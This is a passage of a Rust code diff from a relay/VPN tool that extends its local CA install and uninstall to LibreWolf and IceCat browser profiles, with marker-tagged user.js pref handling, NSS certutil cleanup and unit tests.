+    // automatically by flipping the `security.enterprise_roots.enabled`
+    // pref in user.js of every Mozilla-family profile we find. This is
+    // the cleanest cross-platform fix because it doesn't depend on
+    // whether NSS certutil is installed — the browser just starts
+    // trusting whatever the OS trusts. Especially important on Windows
+    // where NSS certutil isn't on PATH.
+    enable_mozilla_enterprise_roots();
 
     if !has_nss_certutil() {
         tracing::debug!(
-            "NSS certutil not found — Firefox will still trust the CA via the \
-             `security.enterprise_roots.enabled` user.js pref (flipped above). \
+            "NSS certutil not found — Firefox/LibreWolf will still trust the CA via \
+             the `security.enterprise_roots.enabled` user.js pref (flipped above). \
              For Chrome/Chromium on Linux, install `libnss3-tools` (Debian/Ubuntu) \
              or `nss-tools` (Fedora/RHEL), or import ca.crt manually via \
              chrome://settings/certificates → Authorities."
@@ -388,8 +874,8 @@ fn install_nss_stores(cert_path: &str) {
     let mut ok = 0;
     let mut tried = 0;
 
-    // 1. Firefox profiles.
-    for p in firefox_profile_dirs() {
+    // 1. Firefox/LibreWolf profiles.
+    for p in mozilla_family_profile_dirs() {
         tried += 1;
         if install_nss_in_profile(&p, cert_path) {
             ok += 1;
@@ -425,77 +911,184 @@ fn install_nss_stores(cert_path: &str) {
         tracing::info!("CA installed in {}/{} NSS store(s).", ok, tried);
     } else if tried > 0 {
         tracing::warn!(
-            "NSS install: 0/{} stores updated. If Firefox/Chrome was running, close \
-             them and retry. Otherwise, import ca.crt manually via browser settings.",
+            "NSS install: 0/{} stores updated. If Firefox/LibreWolf/Chrome was running, \
+             close them and retry. Otherwise, import ca.crt manually via browser settings.",
             tried
         );
     }
 }
 
 /// Write `user_pref("security.enterprise_roots.enabled", true);` to every
-/// discovered Firefox profile's user.js. This makes Firefox trust the OS
-/// trust store on next startup — so our already-successful system-level
-/// CA install automatically propagates. Critical on Windows where Firefox
-/// keeps its own NSS DB independent of Windows cert store, and NSS
-/// certutil isn't typically installed so the certutil-based path doesn't
-/// fire there.
+/// discovered Firefox/LibreWolf profile's user.js, so the browser trusts
+/// the OS trust store (and with it our system-level CA) on next startup.
+/// Critical on Windows, where the browser keeps its own NSS DB and NSS
+/// certutil usually isn't installed, so the certutil path doesn't fire.
 ///
-/// Existing user.js entries for other prefs are preserved by appending
-/// rather than truncating. Idempotent.
-fn enable_firefox_enterprise_roots() {
-    const PREF: &str = r#"user_pref("security.enterprise_roots.enabled", true);"#;
+/// The pref is written under a sentinel marker comment so uninstall can
+/// prove ownership before removing it; a pre-existing user-owned pref is
+/// never touched. A user.js that exists but cannot be read (e.g. it is
+/// not valid UTF-8) is skipped rather than overwritten. Idempotent.
+fn enable_mozilla_enterprise_roots() {
     let mut touched = 0;
-    for profile in firefox_profile_dirs() {
+    for profile in mozilla_family_profile_dirs() {
         let user_js = profile.join("user.js");
-        let existing = std::fs::read_to_string(&user_js).unwrap_or_default();
-        if existing.contains("security.enterprise_roots.enabled") {
-            // Already set by us or the user. Replace-or-keep: if they set it
-            // to false we leave their choice alone. If it's already our line
-            // verbatim, nothing to do.
-            if existing.contains(PREF) {
-                continue;
+        // A missing user.js is an empty one; any other read failure skips
+        // the profile, because writing would clobber prefs we couldn't read.
+        let existing = match std::fs::read_to_string(&user_js) {
+            Ok(text) => text,
+            Err(e) if e.kind() == std::io::ErrorKind::NotFound => String::new(),
+            Err(_) => continue,
+        };
+        match add_enterprise_roots_block(&existing) {
+            EnterpriseRootsEdit::AddedBlock(new) => match std::fs::write(&user_js, new) {
+                Ok(()) => touched += 1,
+                Err(e) => tracing::debug!(
+                    "mozilla profile {}: user.js write failed: {}",
+                    profile.display(),
+                    e
+                ),
+            },
+            EnterpriseRootsEdit::AlreadyOurs => {}
+            EnterpriseRootsEdit::UserOwned => {
+                tracing::debug!(
+                    "mozilla profile {} already has a user-owned enterprise_roots pref; leaving alone",
+                    profile.display()
+                );
             }
-            // Different value present — don't overwrite.
-            tracing::debug!(
-                "firefox profile {} already has a different enterprise_roots pref; leaving alone",
-                profile.display()
-            );
-            continue;
-        }
-        let mut out = existing;
-        if !out.is_empty() && !out.ends_with('\n') {
-            out.push('\n');
-        }
-        out.push_str(PREF);
-        out.push('\n');
-        if let Err(e) = std::fs::write(&user_js, out) {
-            tracing::debug!(
-                "firefox profile {}: user.js write failed: {}",
-                profile.display(),
-                e
-            );
-            continue;
         }
-        touched += 1;
     }
     if touched > 0 {
         tracing::info!(
-            "enabled Firefox enterprise_roots in {} profile(s) — restart Firefox for it to take effect",
+            "enabled enterprise_roots in {} Firefox/LibreWolf profile(s) — restart the browser for it to take effect",
             touched
         );
     }
 }
 
+// ── Firefox enterprise_roots marker-block helpers (pure, testable) ──
+//
+// We write a two-line block into user.js — a sentinel comment followed
+// by the pref itself. The marker proves we wrote it, so uninstall can
+// distinguish our own line from a user-authored one with the same
+// value. Any other `security.enterprise_roots.enabled` line (anything
+// but our exact pref directly under our marker) means "hands off".
+const FX_MARKER: &str = "// mhrv-rs: auto-added, safe to strip with --remove-cert";
+const FX_PREF: &str = r#"user_pref("security.enterprise_roots.enabled", true);"#;
+
+#[derive(Debug, PartialEq, Eq)]
+enum EnterpriseRootsEdit {
+    AddedBlock(String), // block appended; payload is the full new user.js text
+    AlreadyOurs, // our marker+pref block is already present, nothing to write
+    UserOwned, // an enterprise_roots mention we did not write exists; hands off
+}
+
+/// Work out how a profile's `user.js` text must change to carry our
+/// marker+pref block. Yields `AlreadyOurs` when the block is already
+/// there (idempotent no-op), `UserOwned` when `enterprise_roots` is
+/// mentioned anywhere else (we never override the user's choice), and
+/// otherwise `AddedBlock` holding `existing` with the block appended on
+/// its own lines.
+fn add_enterprise_roots_block(existing: &str) -> EnterpriseRootsEdit {
+    if contains_our_block(existing) {
+        return EnterpriseRootsEdit::AlreadyOurs;
+    }
+    if existing.contains("security.enterprise_roots.enabled") {
+        return EnterpriseRootsEdit::UserOwned;
+    }
+    // Terminate a dangling last line so the marker starts on a fresh one.
+    let sep = if existing.is_empty() || existing.ends_with('\n') {
+        ""
+    } else {
+        "\n"
+    };
+    EnterpriseRootsEdit::AddedBlock(format!("{}{}{}\n{}\n", existing, sep, FX_MARKER, FX_PREF))
+}
+
+/// Strip our marker+pref block from `existing` if present. If the pref
+/// exists without our marker directly above it, the user owns it — we
+/// cannot prove otherwise and leave user.js untouched.
+///
+/// Every line that is kept is copied back byte-for-byte, including its
+/// own line terminator, so a CRLF user.js is not rewritten to LF.
+///
+/// Consequence for upgrades from pre-marker versions of this app: the
+/// legacy bare pref line stays orphaned in user.js after uninstall.
+/// That's cosmetic only (Firefox falls back to its built-in root store
+/// the moment the CA leaves the OS trust store), and it's the
+/// conservative tradeoff — a bare `enterprise_roots = true` line is
+/// indistinguishable from a user- or enterprise-policy-authored one,
+/// and silently revoking that would break unrelated Firefox trust
+/// behavior. README documents the orphan.
+fn strip_enterprise_roots_block(existing: &str) -> Option<String> {
+    if !contains_our_block(existing) {
+        return None;
+    }
+    // `split_inclusive` keeps each line's terminator attached to the line.
+    let lines: Vec<&str> = existing.split_inclusive('\n').collect();
+    let mut out = String::with_capacity(existing.len());
+    let mut i = 0;
+    while i < lines.len() {
+        let is_marker = lines[i].trim() == FX_MARKER;
+        let next_is_our_pref = lines.get(i + 1).map_or(false, |l| l.trim() == FX_PREF);
+        if is_marker && next_is_our_pref {
+            i += 2;
+            continue;
+        }
+        out.push_str(lines[i]);
+        i += 1;
+    }
+    Some(out)
+}
+
+/// True iff `existing` contains our sentinel directly above our pref.
+/// Both lines are compared after trimming surrounding whitespace, so
+/// indentation around either line does not defeat the match.
+fn contains_our_block(existing: &str) -> bool {
+    // Pair every line with its successor and look for marker → pref.
+    let successors = existing.lines().skip(1);
+    existing
+        .lines()
+        .zip(successors)
+        .any(|(above, below)| above.trim() == FX_MARKER && below.trim() == FX_PREF)
+}
+
+/// Report an orphan pref: `existing` holds our exact pref line
+/// (`security.enterprise_roots.enabled = true`) but no marker+pref
+/// block, so we cannot prove who wrote it. A `false` variant of the
+/// pref never counts, since it is not our exact line.
+///
+/// `disable_mozilla_enterprise_roots` uses this to print a one-line
+/// hint on uninstall, so users upgrading from pre-v1.2.13 installs
+/// know the leftover pref in their Firefox user.js is cosmetic (not
+/// broken, just left in place because it is indistinguishable from a
+/// user-authored line).
+fn has_bare_enterprise_roots(existing: &str) -> bool {
+    let pref_line_present = existing.lines().any(|line| line.trim() == FX_PREF);
+    pref_line_present && !contains_our_block(existing)
+}
+
 fn has_nss_certutil() -> bool {
+    // Detect NSS's `certutil` (from libnss3-tools) rather than the
+    // unrelated Windows built-in `certutil.exe`, which shares the binary
+    // name. The previous heuristic looked for "-d" in the help output
+    // and false-positived on Windows, whose help text lists `-dump` /
+    // `-dumpPFX`.
+    //
+    // "nickname" is NSS terminology (certs are addressed as
+    // `-n <nickname>`); the Windows and macOS built-in certutils don't
+    // use that term, so a case-insensitive search of stderr+stdout for
+    // it discriminates. A failed spawn (no `certutil` on PATH) is `false`.
     Command::new("certutil")
         .arg("--help")
         .output()
         .ok()
         .map(|o| {
-            // macOS has a different certutil built-in that doesn't support -d.
-            // NSS-specific help output mentions the -d / -n flags.
-            String::from_utf8_lossy(&o.stderr).contains("-d")
-                || String::from_utf8_lossy(&o.stdout).contains("-d")
+            let combined = format!(
+                "{}{}",
+                String::from_utf8_lossy(&o.stderr),
+                String::from_utf8_lossy(&o.stdout)
+            );
+            combined.to_ascii_lowercase().contains("nickname")
         })
         .unwrap_or(false)
 }
@@ -516,15 +1109,7 @@ fn install_nss_in_dir(dir_arg: &str, cert_path: &str) -> bool {
 
     let res = Command::new("certutil")
         .args([
-            "-A",
-            "-n",
-            CERT_NAME,
-            "-t",
-            "C,,",
-            "-d",
-            dir_arg,
-            "-i",
-            cert_path,
+            "-A", "-n", CERT_NAME, "-t", "C,,", "-d", dir_arg, "-i", cert_path,
         ])
         .output();
     match res {
@@ -559,16 +1144,273 @@ fn install_nss_in_profile(profile: &Path, cert_path: &str) -> bool {
     install_nss_in_dir(&dir_arg, cert_path)
 }
 
-fn firefox_profile_dirs() -> Vec<std::path::PathBuf> {
-    use std::path::PathBuf;
+/// Outcome of an NSS cleanup pass. `tried` / `ok` let callers render
+/// accurate messages like "NSS cleanup partial: 1/3 stores updated".
+/// `tool_missing_with_stores_present` flags the case where we found
+/// Firefox/Chrome NSS DBs but NSS `certutil` isn't on PATH — surfaced
+/// so the UI/CLI can tell the user why the cleanup is incomplete.
+#[derive(Debug, Clone, Copy, Default)]
+pub struct NssReport {
+    pub tried: usize,
+    pub ok: usize,
+    pub tool_missing_with_stores_present: bool,
+}
+
+impl NssReport {
+    /// True when nothing is left to clean up by hand: every store we
+    /// tried was updated and a missing NSS `certutil` did not block us.
+    pub fn is_clean(&self) -> bool {
+        !self.tool_missing_with_stores_present && self.tried == self.ok
+    }
+}
+
+/// Best-effort reverse of `install_nss_stores`: delete our cert from
+/// every Firefox profile NSS DB we can find, plus the shared Chrome/
+/// Chromium NSS DB on Linux, and remove the user.js pref we added.
+///
+/// NSS cleanup is explicitly best-effort — `certutil` from libnss3-tools
+/// may be missing, a DB may be locked by a running Firefox/Chrome, or
+/// the delete may fail for reasons we can't distinguish. When that
+/// happens we log a manual-cleanup hint but don't fail the whole
+/// revocation. Callers of `remove_ca` should convey this to users so
+/// the `--remove-cert` promise is "OS trust store + best-effort NSS",
+/// not "guaranteed NSS".
+///
+/// Returns the per-store tally; when NSS `certutil` is missing, nothing
+/// is attempted and the report only records whether a store was seen.
+fn remove_nss_stores() -> NssReport {
+    disable_mozilla_enterprise_roots();
+
+    if !has_nss_certutil() {
+        // Only warn if there's actually an NSS store we can see — if the
+        // user never ran Firefox/Chrome on this machine there's nothing
+        // to clean up either way.
+        let profiles = mozilla_family_profile_dirs();
+        #[cfg(target_os = "linux")]
+        let chrome_present = chrome_nssdb_path()
+            .map(|p| p.join("cert9.db").exists() || p.join("cert8.db").exists())
+            .unwrap_or(false);
+        #[cfg(not(target_os = "linux"))]
+        let chrome_present = false;
+        let stores_present = !profiles.is_empty() || chrome_present;
+        if stores_present {
+            tracing::warn!(
+                "NSS certutil not found — cannot automatically remove CA from \
+                 Firefox/LibreWolf/Chrome NSS stores. Remove `MasterHttpRelayVPN` \
+                 manually via each browser's certificate settings, or install NSS \
+                 tools (`libnss3-tools` on Debian/Ubuntu, `nss-tools` on Fedora/RHEL) \
+                 and re-run --remove-cert."
+            );
+        }
+        return NssReport {
+            tried: 0,
+            ok: 0,
+            tool_missing_with_stores_present: stores_present,
+        };
+    }
+
+    let mut report = NssReport::default();
+
+    for p in mozilla_family_profile_dirs() {
+        report.tried += 1;
+        if remove_nss_in_profile(&p) {
+            report.ok += 1;
+        }
+    }
+
+    #[cfg(target_os = "linux")]
+    {
+        if let Some(nssdb) = chrome_nssdb_path() {
+            if nssdb.join("cert9.db").exists() || nssdb.join("cert8.db").exists() {
+                report.tried += 1;
+                let dir_arg = format!("sql:{}", nssdb.display());
+                if remove_nss_in_dir(&dir_arg) {
+                    report.ok += 1;
+                    tracing::info!(
+                        "Removed CA from Chrome/Chromium NSS DB: {}",
+                        nssdb.display()
+                    );
+                }
+            }
+        }
+    }
+
+    if report.tried > 0 {
+        if report.ok == report.tried {
+            tracing::info!("Removed CA from {} NSS store(s).", report.ok);
+        } else {
+            tracing::warn!(
+                "NSS cleanup partial: {}/{} stores updated. If Firefox/LibreWolf/Chrome \
+                 was running, close it and re-run --remove-cert. Otherwise \
+                 remove `MasterHttpRelayVPN` manually via each browser's cert \
+                 settings.",
+                report.ok,
+                report.tried
+            );
+        }
+    }
+    report
+}
+
+/// Best-effort removal of our cert from a single NSS DB (`dir_arg` is
+/// passed to `certutil -d` as-is).
+///
+/// A DB that never held the cert counts as success, which keeps the
+/// call idempotent. A failed probe does not: if `certutil -L` errors
+/// for any reason other than the not-found message recognised by
+/// `is_nss_not_found` (locked by a running browser, corrupt,
+/// inaccessible), we return `false` so an incomplete revocation is
+/// never reported as clean.
+fn remove_nss_in_dir(dir_arg: &str) -> bool {
+    // Step 1: probe for our nickname so "absent" and "broken DB" stay distinct.
+    let probe = Command::new("certutil")
+        .args(["-L", "-n", CERT_NAME, "-d", dir_arg])
+        .output();
+    let probe = match probe {
+        Ok(out) => out,
+        Err(e) => {
+            tracing::warn!("NSS {}: probe exec failed: {}", dir_arg, e);
+            return false;
+        }
+    };
+    if !probe.status.success() {
+        let stderr = String::from_utf8_lossy(&probe.stderr);
+        if is_nss_not_found(&stderr) {
+            tracing::debug!("NSS {}: no `{}` entry — already clean", dir_arg, CERT_NAME);
+            return true;
+        }
+        tracing::warn!(
+            "NSS {}: probe failed (DB locked / inaccessible / other error): {}",
+            dir_arg,
+            stderr.trim()
+        );
+        return false;
+    }
+
+    // Step 2: the cert is present — delete it.
+    let deletion = Command::new("certutil")
+        .args(["-D", "-n", CERT_NAME, "-d", dir_arg])
+        .output();
+    match deletion {
+        Ok(out) if out.status.success() => true,
+        Ok(out) => {
+            tracing::warn!(
+                "NSS {}: delete failed: {}",
+                dir_arg,
+                String::from_utf8_lossy(&out.stderr).trim()
+            );
+            false
+        }
+        Err(e) => {
+            tracing::warn!("NSS {}: delete exec failed: {}", dir_arg, e);
+            false
+        }
+    }
+}
+
+/// Decide whether NSS `certutil` stderr means "nickname not present"
+/// (the idempotent-success signal) rather than some other failure such
+/// as a locked or corrupt DB. Matching is case-insensitive and limited
+/// to the two known not-found phrasings; everything else is a failure.
+fn is_nss_not_found(stderr: &str) -> bool {
+    const NOT_FOUND_PHRASES: [&str; 2] = ["could not find cert", "could not find a certificate"];
+    let lowered = stderr.to_ascii_lowercase();
+    NOT_FOUND_PHRASES.iter().any(|phrase| lowered.contains(phrase))
+}
+
+/// Remove our cert from one profile: `sql:` DB if cert9.db, legacy if cert8.db.
+fn remove_nss_in_profile(profile: &Path) -> bool {
+    let has_db = |name: &str| profile.join(name).exists();
+    if has_db("cert9.db") {
+        remove_nss_in_dir(&format!("sql:{}", profile.display()))
+    } else if has_db("cert8.db") {
+        remove_nss_in_dir(&profile.display().to_string())
+    } else {
+        false
+    }
+}
+
+/// Undo `enable_mozilla_enterprise_roots`: for each profile, strip the
+/// marker+pref block if (and only if) we wrote it. If the user owns
+/// their own `enterprise_roots` pref — indicated by the absence of our
+/// marker line — leave user.js alone entirely. A failed rewrite of
+/// user.js is logged as a warning and does not stop the other profiles.
+fn disable_mozilla_enterprise_roots() {
+    for profile in mozilla_family_profile_dirs() {
+        let user_js = profile.join("user.js");
+        let Ok(existing) = std::fs::read_to_string(&user_js) else {
+            continue;
+        };
+        if let Some(new) = strip_enterprise_roots_block(&existing) {
+            if let Err(e) = std::fs::write(&user_js, new) {
+                tracing::warn!("user.js write failed for {}: {}", user_js.display(), e);
+            }
+            continue;
+        }
+        // No marker block to strip. Surface an orphan pref so the user
+        // isn't left wondering why it survived --remove-cert; it is
+        // harmless, but silent leftovers feel like half-done removals.
+        if has_bare_enterprise_roots(&existing) {
+            tracing::info!(
+                "Mozilla profile {}: `security.enterprise_roots.enabled` pref \
+                 present without our marker — left in place. If it was written \
+                 by a pre-v1.2.13 install it's a cosmetic orphan (harmless, the \
+                 browser falls back to its built-in root store); remove it \
+                 manually from user.js if it bothers you. If you set it \
+                 yourself, leave it.",
+                profile.display()
+            );
+        }
+    }
+}
+
+/// Candidate root directories under which Mozilla-family browser profile
+/// directories (each containing cert9.db / cert8.db) live. Pure helper —
+/// OS / HOME / APPDATA / XDG_CONFIG_HOME come in as args so the
+/// per-platform layout can be asserted in unit tests without touching
+/// env or the filesystem.
+///
+/// LibreWolf (issue #1145) is a Firefox fork with strict privacy
+/// defaults that shares Firefox's NSS DB layout and respects the same
+/// `security.enterprise_roots.enabled` pref, but stores its profile tree
+/// under its own app dir — so the original Firefox-only scan missed it
+/// and the MITM CA never reached LibreWolf's trust store. HSTS-protected
+/// sites (bing.com, youtube.com, …) then failed with
+/// MOZILLA_PKIX_ERROR_MITM_DETECTED with no add-exception path the user
+/// could take.
+///
+/// On Linux we have to scan five candidate Mozilla-fork layouts:
+///   * `~/.librewolf` — LibreWolf legacy Firefox-style layout (still
+///     present on pre-migration installs).
+///   * `${XDG_CONFIG_HOME:-~/.config}/librewolf/librewolf` — LibreWolf
+///     current XDG layout.
+///   * Both LibreWolf paths again under
+///     `~/.var/app/io.gitlab.librewolf-community/` for the Flatpak
+///     sandbox, which redirects HOME inside the container.
+///   * `~/.mozilla/icecat` — GNU IceCat (Firefox fork shipped by
+///     Trisquel / Parabola / Guix / Debian). Same NSS DB format and
+///     `security.enterprise_roots.enabled` semantics as Firefox; only
+///     the binary's branded profile dir differs. Windows/macOS builds
+///     are not officially distributed, so we don't list paths there.
+/// Non-existent roots silently no-op via `read_dir` failure, so listing
+/// all of them costs nothing on installs that only have one.
+fn mozilla_family_profile_roots(
+    os: &str,
+    home: &str,
+    appdata: Option<&str>,
+    xdg_config_home: Option<&str>,
+) -> Vec<PathBuf> {
     let mut roots: Vec<PathBuf> = Vec::new();
-    let home = std::env::var("HOME").unwrap_or_default();
-    match std::env::consts::OS {
+    match os {
         "macos" => {
             roots.push(PathBuf::from(format!(
                 "{}/Library/Application Support/Firefox/Profiles",
                 home
             )));
+            roots.push(PathBuf::from(format!(
+                "{}/Library/Application Support/LibreWolf/Profiles",
+                home
+            )));
         }
         "linux" => {
             roots.push(PathBuf::from(format!("{}/.mozilla/firefox", home)));
@@ -576,17 +1418,52 @@ fn firefox_profile_dirs() -> Vec<std::path::PathBuf> {
                 "{}/snap/firefox/common/.mozilla/firefox",
                 home
             )));
+            // Legacy LibreWolf layout (still present on older installs).
+            roots.push(PathBuf::from(format!("{}/.librewolf", home)));
+            // Current XDG layout. Empty XDG_CONFIG_HOME is treated as
+            // unset per XDG Base Directory spec.
+            let xdg = xdg_config_home
+                .filter(|v| !v.is_empty())
+                .map(String::from)
+                .unwrap_or_else(|| format!("{}/.config", home));
+            roots.push(PathBuf::from(format!("{}/librewolf/librewolf", xdg)));
+            // Flatpak sandbox: per-app state lives under
+            // ~/.var/app/<flatpak-id>/; cover the legacy and XDG layouts
+            // there too. NOTE(review): Flatpak's default XDG_CONFIG_HOME is
+            // ~/.var/app/<id>/config, not `.config` — confirm this path.
+            let flatpak_home = format!("{}/.var/app/io.gitlab.librewolf-community", home);
+            roots.push(PathBuf::from(format!("{}/.librewolf", flatpak_home)));
+            roots.push(PathBuf::from(format!(
+                "{}/.config/librewolf/librewolf",
+                flatpak_home
+            )));
+            // GNU IceCat: Firefox fork shipped by Trisquel / Parabola /
+            // Guix / Debian, primarily a GNU/Linux distribution target.
+            // Mirrors Firefox's `~/.mozilla/firefox` layout under
+            // `~/.mozilla/icecat`.
+            roots.push(PathBuf::from(format!("{}/.mozilla/icecat", home)));
         }
         "windows" => {
-            if let Ok(appdata) = std::env::var("APPDATA") {
-                roots.push(PathBuf::from(format!("{}\\Mozilla\\Firefox\\Profiles", appdata)));
+            if let Some(appdata) = appdata {
+                roots.push(PathBuf::from(format!(
+                    "{}\\Mozilla\\Firefox\\Profiles",
+                    appdata
+                )));
+                roots.push(PathBuf::from(format!("{}\\LibreWolf\\Profiles", appdata)));
             }
         }
         _ => {}
     }
+    roots
+}
 
+/// Walk each candidate root and return every immediate child that looks
+/// like a Mozilla NSS profile (has cert9.db or cert8.db). Pure given the
+/// roots — no env access — so tempdir tests can pin the filter without
+/// stubbing HOME/APPDATA. Missing roots silently skip.
+fn discover_profile_dirs(roots: &[PathBuf]) -> Vec<PathBuf> {
     let mut out: Vec<PathBuf> = Vec::new();
-    for root in &roots {
+    for root in roots {
         let Ok(entries) = std::fs::read_dir(root) else {
             continue;
         };
@@ -595,7 +1472,7 @@ fn firefox_profile_dirs() -> Vec<std::path::PathBuf> {
             if !p.is_dir() {
                 continue;
             }
-            // A profile has cert9.db or cert8.db.
+            // A profile has cert9.db (NSS sql:) or cert8.db (legacy dbm:).
             if p.join("cert9.db").exists() || p.join("cert8.db").exists() {
                 out.push(p);
             }
@@ -604,6 +1481,19 @@ fn firefox_profile_dirs() -> Vec<std::path::PathBuf> {
     out
 }
 
+/// Profile dirs on this machine: roots built from the live OS/env, then scanned.
+fn mozilla_family_profile_dirs() -> Vec<std::path::PathBuf> {
+    let env = |key: &str| std::env::var(key).ok();
+    let home = env("HOME").unwrap_or_default();
+    let (appdata, xdg) = (env("APPDATA"), env("XDG_CONFIG_HOME"));
+    discover_profile_dirs(&mozilla_family_profile_roots(
+        std::env::consts::OS,
+        &home,
+        appdata.as_deref(),
+        xdg.as_deref(),
+    ))
+}
+
 #[cfg(test)]
 mod tests {
     use super::*;
@@ -689,4 +1579,462 @@ ID_LIKE=debian
         let content = "SOMEFIELD=maybearchived\nFOO=bar\n";
         assert_eq!(classify_os_release(content), "unknown");
     }
+
+    // ── Firefox user.js block install / uninstall ──
+
+    #[test]
+    fn enterprise_roots_block_added_to_empty_userjs() {
+        let got = add_enterprise_roots_block("");
+        let expected = format!("{}\n{}\n", FX_MARKER, FX_PREF);
+        assert_eq!(got, EnterpriseRootsEdit::AddedBlock(expected));
+    }
+
+    #[test]
+    fn enterprise_roots_block_appended_preserving_existing_prefs() {
+        let existing = "user_pref(\"some.other\", 1);\n";
+        let got = add_enterprise_roots_block(existing);
+        let expected = format!(
+            "user_pref(\"some.other\", 1);\n{}\n{}\n",
+            FX_MARKER, FX_PREF
+        );
+        assert_eq!(got, EnterpriseRootsEdit::AddedBlock(expected));
+    }
+
+    #[test]
+    fn enterprise_roots_block_is_idempotent_when_marker_present() {
+        let existing = format!(
+            "user_pref(\"a\", 1);\n{}\n{}\nuser_pref(\"b\", 2);\n",
+            FX_MARKER, FX_PREF
+        );
+        assert_eq!(
+            add_enterprise_roots_block(&existing),
+            EnterpriseRootsEdit::AlreadyOurs
+        );
+    }
+
+    #[test]
+    fn enterprise_roots_block_respects_user_owned_pref_without_marker() {
+        // User has enterprise_roots set themselves — no marker above it.
+        // We must NOT write our line, and we must NOT claim ownership on
+        // uninstall (tested separately below).
+        let existing = "user_pref(\"security.enterprise_roots.enabled\", true);\n";
+        assert_eq!(
+            add_enterprise_roots_block(existing),
+            EnterpriseRootsEdit::UserOwned
+        );
+    }
+
+    #[test]
+    fn enterprise_roots_block_respects_user_owned_pref_set_to_false() {
+        // User explicitly disabled it — also a user-owned pref, leave alone.
+        let existing = "user_pref(\"security.enterprise_roots.enabled\", false);\n";
+        assert_eq!(
+            add_enterprise_roots_block(existing),
+            EnterpriseRootsEdit::UserOwned
+        );
+    }
+
+    #[test]
+    fn strip_enterprise_roots_removes_our_block_and_preserves_others() {
+        let before = format!(
+            "user_pref(\"a\", 1);\n{}\n{}\nuser_pref(\"b\", 2);\n",
+            FX_MARKER, FX_PREF
+        );
+        let after = strip_enterprise_roots_block(&before).expect("should strip");
+        assert_eq!(after, "user_pref(\"a\", 1);\nuser_pref(\"b\", 2);\n");
+    }
+
+    #[test]
+    fn strip_enterprise_roots_refuses_when_pref_is_bare() {
+        // No marker above — indistinguishable from a user- or
+        // enterprise-policy-authored line. Must return None so caller
+        // leaves user.js untouched. Legacy upgrade users get one
+        // cosmetic orphan line; revoking user-owned Firefox trust
+        // behavior silently is worse.
+        let before = "user_pref(\"security.enterprise_roots.enabled\", true);\n";
+        assert_eq!(strip_enterprise_roots_block(before), None);
+    }
+
+    #[test]
+    fn strip_enterprise_roots_refuses_when_marker_is_elsewhere() {
+        // Marker present but not directly above the pref — user may
+        // have copied our marker line as a comment somewhere else. We
+        // still can't prove ownership of the pref itself, so leave
+        // alone.
+        let before = format!(
+            "{}\nuser_pref(\"unrelated\", 1);\n\
+             user_pref(\"security.enterprise_roots.enabled\", true);\n",
+            FX_MARKER
+        );
+        assert_eq!(strip_enterprise_roots_block(&before), None);
+    }
+
+    #[test]
+    fn strip_enterprise_roots_leaves_user_false_pref_alone() {
+        let before = "user_pref(\"security.enterprise_roots.enabled\", false);\n";
+        assert_eq!(strip_enterprise_roots_block(before), None);
+    }
+
+    #[test]
+    fn strip_enterprise_roots_returns_none_when_pref_absent() {
+        let before = "user_pref(\"other\", 1);\nuser_pref(\"another\", 2);\n";
+        assert_eq!(strip_enterprise_roots_block(before), None);
+    }
+
+    #[test]
+    fn strip_enterprise_roots_roundtrip_from_empty() {
+        // add_block("") -> strip_block(added) -> "" (no trailing garbage).
+        let added = match add_enterprise_roots_block("") {
+            EnterpriseRootsEdit::AddedBlock(s) => s,
+            other => panic!("unexpected: {:?}", other),
+        };
+        let stripped = strip_enterprise_roots_block(&added).expect("should strip");
+        assert_eq!(stripped, "");
+    }
+
+    // ── has_bare_enterprise_roots ──
+
+    #[test]
+    fn bare_enterprise_roots_detected_when_no_marker_present() {
+        let content = "user_pref(\"security.enterprise_roots.enabled\", true);\n";
+        assert!(has_bare_enterprise_roots(content));
+    }
+
+    #[test]
+    fn bare_enterprise_roots_not_detected_when_marker_block_present() {
+        // Our marker+pref block — strip handles this; has_bare_ must
+        // return false so we don't double-warn about a line we own.
+        let content = format!("{}\n{}\n", FX_MARKER, FX_PREF);
+        assert!(!has_bare_enterprise_roots(&content));
+    }
+
+    #[test]
+    fn bare_enterprise_roots_not_detected_when_pref_absent() {
+        let content = "user_pref(\"other\", 1);\n";
+        assert!(!has_bare_enterprise_roots(content));
+    }
+
+    #[test]
+    fn bare_enterprise_roots_ignores_false_variant() {
+        // User explicitly set enterprise_roots = false — not our line
+        // and not the pre-marker legacy write (which only ever wrote
+        // true). No orphan to warn about.
+        let content = "user_pref(\"security.enterprise_roots.enabled\", false);\n";
+        assert!(!has_bare_enterprise_roots(content));
+    }
+
+    // ── should_reconcile_for ──
+
+    #[test]
+    fn reconcile_skipped_for_normal_user() {
+        // euid != 0 — even with SUDO_USER set we must NOT re-root HOME.
+        // A non-root process that happened to inherit SUDO_USER (or
+        // used `sudo -E`) shouldn't get to redirect cert paths.
+        assert_eq!(should_reconcile_for(1000, Some("alice")), None);
+        assert_eq!(should_reconcile_for(1000, None), None);
+    }
+
+    #[test]
+    fn reconcile_skipped_for_real_root_login_without_sudo() {
+        // Load-bearing case the maintainer asked to pin: euid == 0
+        // AND no SUDO_USER means the process is a real root login,
+        // not a sudo elevation. HOME should stay as /root; we must
+        // not try to resolve some other user's home.
+        assert_eq!(should_reconcile_for(0, None), None);
+    }
+
+    #[test]
+    fn reconcile_skipped_when_sudo_user_is_empty_or_root() {
+        assert_eq!(should_reconcile_for(0, Some("")), None);
+        assert_eq!(should_reconcile_for(0, Some("root")), None);
+    }
+
+    #[test]
+    fn reconcile_triggers_for_real_sudo_invocation() {
+        // euid == 0 AND SUDO_USER points to a non-root user — this is
+        // the sudo case we do want to reconcile.
+        assert_eq!(should_reconcile_for(0, Some("alice")), Some("alice"));
+    }
+
+    // ── sudo_parse_passwd_home ──
+
+    #[test]
+    fn parses_debian_passwd_entry() {
+        let line = "liyon:x:1000:1000:Liyon,,,:/home/liyon:/bin/bash\n";
+        assert_eq!(sudo_parse_passwd_home(line), Some("/home/liyon".into()));
+    }
+
+    #[test]
+    fn macos_passwd_format_does_not_parse_and_falls_back_to_convention() {
+        // macOS `dscl`-sourced passwd lines have extra fields
+        // (pw_class, chg, exp) before home, so index 5 lands on a
+        // non-home field. sudo_parse_passwd_home is intentionally
+        // Linux-shaped — the macOS path relies on the `/Users/<user>`
+        // convention in `unix::resolve_home` rather than on this
+        // parser. This test pins that contract.
+        let line = "liyon:*:501:20::0:0:Liyon Bonakdar:/Users/liyon:/bin/zsh";
+        assert_ne!(sudo_parse_passwd_home(line), Some("/Users/liyon".into()));
+    }
+
+    #[test]
+    fn rejects_malformed_passwd_line_too_few_fields() {
+        let line = "liyon:x:1000:1000\n";
+        assert_eq!(sudo_parse_passwd_home(line), None);
+    }
+
+    #[test]
